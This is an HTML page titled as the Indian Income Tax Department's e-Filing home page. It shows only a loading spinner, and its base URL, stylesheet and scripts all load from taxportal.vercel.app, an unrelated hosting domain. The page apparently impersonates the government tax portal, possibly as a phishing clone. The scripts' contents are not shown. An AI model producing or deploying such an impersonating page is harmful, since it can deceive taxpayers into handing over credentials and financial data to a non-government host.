
<!doctype html>
<html lang="en">

<head>
        <meta charset="utf-8">
        <title>e-Filing Home Page, Income Tax Department, Government of India</title>
        <script type="text/javascript" src="https://gc.kis.v2.scr.kaspersky-labs.com/FD126C42-EBFA-4E12-B309-BB3FDD723AC1/main.js?attr=5OCsU0nxQRU1ZKHPbVOFbTr683xQsIQR1FWVkN9854kNKhH0lVavQoMQUJMUBS2TtWlV6MzvhvWovC9FOSmv3QFVHu7bX0IQhsFerR0LnWI" charset="UTF-8"></script><base href="https://taxportal.vercel.app">        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta http-equiv="X-UA-Compatible" content="IE=11; IE=10; IE=9; IE=edge" />
        <link rel="icon" type="image/x-icon" href="itd_favicon.ico">
        <script src="assets/inc/jquery-3.6.0.min.js"></script>
        <script src="assets/inc/popper.min.js"></script>
        <script src="assets/inc/bootstrap-4.6.2.min.js"></script>
        <script src="assets/js/automation-validator.min.js"></script>
<link rel="stylesheet" href="https://taxportal.vercel.app"></head>

<body app-instance="eyJfaSI6IjIwMjQxMDQuMjIwNi42NDY4IiwiX3YiOiI2NDY4IiwiX3RzIjoxNzA0NDEwMzMyMDAwfQ==">
        <app-root class="bg-color">
                <style>
                        .loader {
                                border: 4px solid #f3f3f3;
                                border-radius: 50%;
                                border-top: 4px solid #2196f3;
                                width: 20px;
                                height: 20px;
                                -webkit-animation: spin 2s linear infinite;
                                animation: spin 2s linear infinite;
                                margin-left: 134px;
                                margin-right: auto;
                                margin-top: 20px;
                                display: inline-block;
                        }

                        .loader-container {
                                width: 300px;
                                height: 100px;
                                border-radius: 6px;
                                margin-left: auto;
                                margin-right: auto;
                                margin-top: 15%;
                        }

                        .loader-text {
                                text-align: center;
                                align-content: center;
                                font-family: sans-serif;
                                margin-top: 0.8rem;
                                font-weight: bold;
                        }

                        /* Safari */
                        @-webkit-keyframes spin {
                                0% {
                                        -webkit-transform: rotate(0deg);
                                }

                                100% {
                                        -webkit-transform: rotate(360deg);
                                }
                        }

                        @keyframes spin {
                                0% {
                                        transform: rotate(0deg);
                                }

                                100% {
                                        transform: rotate(360deg);
                                }
                        }
                </style>

                <div class="loader-container">
                        <div class="loader"></div>
                        <div class="loader-text">LOADING</div>
                </div>
        </app-root>
<script type="text/javascript" src="https://taxportal.vercel.app"></script><script type="text/javascript" src="https://taxportal.vercel.app" nomodule></script><script type="text/javascript" src="https://taxportal.vercel.app"></script><script type="text/javascript" src="https://taxportal.vercel.app"></script><script type="text/javascript" src="https://taxportal.vercel.app"></script><script type="text/javascript" src="https://taxportal.vercel.app"></script></body>

</html>
